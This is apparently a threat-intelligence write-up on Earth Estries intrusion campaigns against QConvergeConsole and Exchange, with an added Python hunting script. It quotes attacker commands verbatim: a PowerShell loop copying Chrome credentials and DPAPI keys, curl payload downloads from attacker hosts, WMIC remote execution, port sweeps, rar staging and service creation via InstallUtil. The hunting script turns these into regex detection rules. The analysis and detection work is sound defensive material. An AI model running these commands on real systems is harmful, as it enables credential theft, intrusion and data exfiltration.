Man
Behind the scenes of sophisticated cyberattacks on corporate networks.
Trend Micro detailed two large-scale intrusion campaigns by the Earth Estries group. The attackers used advanced techniques to penetrate corporate systems through vulnerabilities in widely deployed software.
The first attack chain centred on QConvergeConsole, a management tool for QLogic Fibre Channel adapters. After gaining initial access, the attackers used PsExec and WMIC to move laterally and push malware to other hosts on the network.
Researchers note that the attackers abused vulnerabilities or misconfigurations in QConvergeConsole through its installed remote agent (c:\program files\qlogic corporation\nqagent\netqlremote.exe), which they used to scan the network and install Cobalt Strike on targeted machines.
In another case, the group exploited the Apache Tomcat 6 instance bundled with QConvergeConsole (c:\program files (x86)\qlogic corporation\qconvergeconsole\tomcat-x64\apache-tomcat-6.0.35\bin\tomcat6.exe) to move laterally and deploy late-stage tools. Tomcat 6.0.x has been end-of-life since the end of 2016, so a bundled copy like this receives no security fixes and is an obvious target on any host still running it.
The group also actively used various backdoors to gain a foothold in the system. Among them are Cobalt Strike, Trillclient, Hemigate and a new sample called Crowdoor. The malware was delivered to infected machines in the form of CAB archives.
Particular attention is drawn to Trillclient, which stole credentials stored by the browser: Chrome's Login Data, cookies and Local State files, together with the user's DPAPI Protect folder that holds the master keys needed to decrypt them. With these, the attackers extended their control over compromised systems. Earth Estries also demonstrated a deep understanding of the victims' infrastructure, downloading documents directly from internal web repositories with wget.
Trillclient ran a PowerShell script to collect these files from every user profile:
Code:
# Loops over the user profiles gathered earlier in the script ($users_path) and copies
# each user's DPAPI master keys and Chrome credential files under $copy_dest_path.
# "echo D" / "echo F" answer xcopy's "directory or file?" prompt so it runs unattended;
# attrib strips the hidden/system/read-only flags so the copies can be read and packed.
foreach($win_user_path in $users_path){
echo D | xcopy "C:\Users\$win_user_path\AppData\Roaming\Microsoft\Protect" "$copy_dest_path\$win_user_path\Protect" /E /C /H;
attrib -a -s -r -h "$copy_dest_path\$win_user_path\*" /S /D;
echo F | xcopy "C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Local State" "$copy_dest_path\$win_user_path\Local State" /C;
echo F | xcopy "C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies" "$copy_dest_path\$win_user_path\Default\Network\Cookies" /C;
echo F | xcopy "C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Default\Login Data" "$copy_dest_path\$win_user_path\Default\Login Data" /C;
}
In the second attack chain, the attackers exploited vulnerabilities in Microsoft Exchange. The servers were planted with the China Chopper web shell, through which the attackers deployed Cobalt Strike and other tools for lateral movement across the network.
The key components of this chain were the Zingdoor and SnappyBee (also known as Deed RAT) backdoors. Tooling was downloaded either from the command-and-control servers or with curl from attacker-controlled sites. Note that in the commands below the payloads are served under .txt or .docx names and written to disk as an extensionless file, a DLL or an EXE; the file extension on the URL says nothing about what is actually fetched. Typical commands looked like this:
Code:
curl -o c:\windows\ime\imejp\VXTR hxxp://96[.]44[.]160[.]181/VXTR.txt
curl -k -o C:\programdata\UNBCL.dll hxxp://mail.ocac.org[.]pk/UNBCL.docx
curl -k -o C:\programdata\portscan.exe hxxp://mail.ocac.org[.]pk/Portscan.docx
Unlike the first chain, the focus here was on exploiting Exchange and updating the malware frequently to evade detection. The group used PortScan extensively to map networks, and additional backdoors helped collect documents and export them in RAR archives.
Earth Estries focused on a covert, long-term presence in victims' networks. They updated their tools regularly and covered their tracks by deleting older versions of the malware. Persistence was ensured by various custom backdoors, including the recently discovered Crowdoor, which worked alongside Cobalt Strike.
For persistence, the attackers used various ways of creating and triggering scheduled tasks, including remote execution over WMIC. The command below launches an already-registered task named microsoft\sihost on a remote host, so the task itself must have been created earlier:
Code:
wmic /node:<IP> /user:<domain>\<user> /password:***** process call create "schtasks /run /tn microsoft\sihost"
Researchers identified several further techniques. In addition to stealing credentials with Trillclient, the attackers hid command-and-control traffic behind local and remote proxy servers.
PortScan and custom scripts were used to reconnoitre the network. After downloading PortScan, the attackers swept /24 ranges for hosts with ports 80, 443, 445 and 3389 open (web, SMB and RDP, the services they would pivot through next):
Code:
cmd.exe /c "C:\programdata\portscan.exe 172.xx.xx.0/24 445,3389,80,443"
cmd.exe /c "C:\programdata\portscan.exe 172.xx.xx.0/24 445,3389,80,443 >1.log"
The collected data was packed into encrypted RAR archives and uploaded to anonymous file-sharing sites. Example collection commands (the -ta switch in the second one limits the archive to files modified after the given cutoff date, which keeps repeat collections small):
Code:
rar.exe a -m5 <install path>\his231.rar "C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\History"
rar.exe a <install path>\0311.rar C:\users\<user name>\Desktop\* C:\users\<user name>\Downloads\* C:\users\<user name>\Documents\* -r -y -ta<cutoff date>
During the investigation two further backdoors were found: FuxosDoor and Cryptmerlin. FuxosDoor runs inside the IIS web server and gives the attackers covert communication with their C&C servers; Cryptmerlin is loaded by DLL sideloading and provides long-term control of infected machines.
Zingdoor and SnappyBee functioned as HTTP backdoors and supported lateral movement across the network. SnappyBee is a modular backdoor believed to be the successor to ShadowPad. Both are loaded by DLL sideloading, so they run inside legitimate host processes rather than as stand-alone binaries.
Through the China Chopper web shell, the attackers created services on remote hosts to escalate privileges and ensure persistence. The service's binpath runs the payload through InstallUtil.exe, a signed Microsoft .NET utility, so the service image is a trusted binary and the unsigned vmvssrv.exe only appears as its argument:
Code:
sc \\{hostname} create VGAuthtools type= own start= auto binpath= "c:\windows\microsoft.net\Framework\v4.0.30319\Installutil.exe C:\Programdata\VMware\vmvssrv.exe"
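Every stage quoted on this page (the Trillclient xcopy of browser files, the curl downloads into ProgramData or Windows from .docx/.txt URLs, the WMIC remote process creation, the CIDR-plus-port-list PortScan invocation, the rar.exe staging of browser history and user folders, and the sc create with an InstallUtil.exe binpath) leaves a process-creation record that an EDR or Sysmon already collects. The following is an added hunting example, not code from Trend Micro or from the actor's toolset: it turns those command lines into rules and runs them over constructed Sysmon-style records. The pipe-delimited log format, host and user names, paths and the 203.0.113.x addresses are assumptions; the w3wp.exe-spawns-shell rule is my own web shell heuristic, not something the report spells out, and the ATT&CK IDs are attached only for triage context.

```python
"""Hunting rules for the Earth Estries command lines quoted above, run over
constructed Sysmon-style process-creation records.  Added example, not code
from Trend Micro or the actor; the log format and sample records are made up."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample records (not real telemetry).  One record per line:
#   host|parent_image|image|command_line
# Hosts, user names, IPs (TEST-NET-3) and paths are assumptions; the command
# lines mirror the ones quoted in the post, with real URLs/IPs replaced.
SAMPLE_LOG = r"""
EXCH01|C:\Windows\System32\inetsrv\w3wp.exe|C:\Windows\System32\cmd.exe|cmd.exe /c "curl -k -o C:\programdata\UNBCL.dll http://203.0.113.10/UNBCL.docx"
EXCH01|C:\Windows\System32\inetsrv\w3wp.exe|C:\Windows\System32\cmd.exe|cmd.exe /c "C:\programdata\portscan.exe 172.16.10.0/24 445,3389,80,443 >1.log"
EXCH01|C:\Windows\System32\cmd.exe|C:\Windows\System32\curl.exe|curl -o c:\windows\ime\imejp\VXTR http://203.0.113.10/VXTR.txt
WS-042|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\xcopy.exe|xcopy "C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\ProgramData\tmp\alice\Default\Login Data" /C
WS-042|C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\WMIC.exe|wmic /node:172.16.10.23 /user:CORP\svc_backup /password:***** process call create "schtasks /run /tn microsoft\sihost"
WS-042|C:\Windows\System32\cmd.exe|C:\Windows\System32\sc.exe|sc \\SRV-FILE01 create VGAuthtools type= own start= auto binpath= "c:\windows\microsoft.net\Framework\v4.0.30319\Installutil.exe C:\Programdata\VMware\vmvssrv.exe"
WS-042|C:\Windows\System32\cmd.exe|C:\Tools\rar.exe|rar.exe a -m5 C:\ProgramData\tmp\his231.rar "C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\History"
WS-042|C:\Windows\explorer.exe|C:\Program Files\Google\Chrome\Application\chrome.exe|"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default
ADMIN01|C:\Windows\System32\cmd.exe|C:\Windows\System32\sc.exe|sc query wuauserv
"""


@dataclass(frozen=True)
class Event:
    host: str
    parent: str
    image: str
    cmdline: str


@dataclass(frozen=True)
class Rule:
    name: str
    attack_id: str                       # MITRE ATT&CK technique, for triage context only
    cmd: Optional[re.Pattern] = None     # matched against the lower-cased command line
    parent: Optional[re.Pattern] = None  # matched against the lower-cased parent image
    image: Optional[re.Pattern] = None   # matched against the lower-cased image path

    def matches(self, ev: Event) -> bool:
        checks = ((self.cmd, ev.cmdline), (self.parent, ev.parent), (self.image, ev.image))
        return all(p is None or p.search(v.lower()) for p, v in checks)


@dataclass(frozen=True)
class Hit:
    rule: str
    attack_id: str
    host: str
    cmdline: str


RULES = [
    # Trillclient-style copy of Chrome credential files or the DPAPI master-key folder.
    Rule("browser-credential-store-copy", "T1555.003",
         cmd=re.compile(r"xcopy\b.*(\\login data|\\cookies|\\local state|\\microsoft\\protect\\)")),
    # curl drops a payload under ProgramData or Windows from a URL disguised as .docx/.txt.
    Rule("curl-download-to-system-dir", "T1105",
         cmd=re.compile(r"curl\b.*-o\s+c:\\(programdata|windows)\\.*https?://\S+\.(docx|txt)\b")),
    # Remote process creation over WMI, used here to trigger a scheduled task on another host.
    Rule("wmic-remote-process-create", "T1047",
         cmd=re.compile(r"wmic\b.*/node:.*process\s+call\s+create")),
    # Any binary handed a CIDR range plus a comma-separated port list (the PortScan pattern).
    Rule("cidr-portscan", "T1046",
         cmd=re.compile(r"\b\d{1,3}(\.\d{1,3}){3}/\d{1,2}\s+(\d{1,5},)+\d{1,5}\b")),
    # rar.exe staging browser history or user document folders for exfiltration.
    Rule("rar-staging-user-data", "T1560.001",
         cmd=re.compile(r"\brar(\.exe)?\s+a\b.*(\\chrome\\user data\\|\\desktop\\|\\documents\\|\\downloads\\)")),
    # Service creation whose binpath abuses InstallUtil.exe to launch an arbitrary file.
    Rule("sc-create-installutil", "T1543.003",
         cmd=re.compile(r"\bsc\b.*\bcreate\b.*\binstallutil\.exe")),
    # IIS worker process spawning a shell: my heuristic for web shell (China Chopper) activity.
    Rule("iis-worker-spawns-shell", "T1505.003",
         parent=re.compile(r"\\w3wp\.exe$"),
         image=re.compile(r"\\(cmd|powershell)\.exe$")),
]


def parse_log(text: str) -> list[Event]:
    """Parse the pipe-delimited sample format; the command line may itself contain '|'."""
    events = []
    for line in text.strip().splitlines():
        host, parent, image, cmdline = line.split("|", 3)
        events.append(Event(host, parent, image, cmdline))
    return events


def run_rules(events: list[Event], rules=RULES) -> list[Hit]:
    """Apply every rule to every event; one Hit per (event, rule) pair that matches."""
    return [Hit(r.name, r.attack_id, ev.host, ev.cmdline)
            for ev in events for r in rules if r.matches(ev)]


def hosts_by_rule(hits: list[Hit]) -> dict[str, set[str]]:
    """Pivot hits into host -> set of rule names, the view an analyst triages from."""
    out: dict[str, set[str]] = {}
    for h in hits:
        out.setdefault(h.host, set()).add(h.rule)
    return out


if __name__ == "__main__":
    for h in run_rules(parse_log(SAMPLE_LOG)):
        print(f"{h.host:8} {h.attack_id:9} {h.rule:32} {h.cmdline[:70]}")
```

Run as a script it prints nine hits across the two compromised hosts and nothing for the benign Chrome launch or the admin's sc query. The point is that none of the rules depends on a hash or a C&C address: each one keys on the shape of a command the report shows the group typing, so the same logic keeps working after the actor rebuilds its binaries, which the report says it does regularly. In production the regexes would run against the command-line field your EDR already records.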
The new Crowdoor backdoor, seen in the first attack chain, expanded the group's ability to reinstall and update Cobalt Strike on compromised systems. It performed various actions depending on the arguments passed, including setting persistence mechanisms through the registry or services.
The China Chopper web shell used in the second chain gave the attackers remote control over the compromised Exchange servers and served as the springboard for the rest of the intrusion.
Experts strongly recommend that organisations patch vulnerabilities in externally reachable services, especially widely deployed applications such as mail servers and management consoles.
Source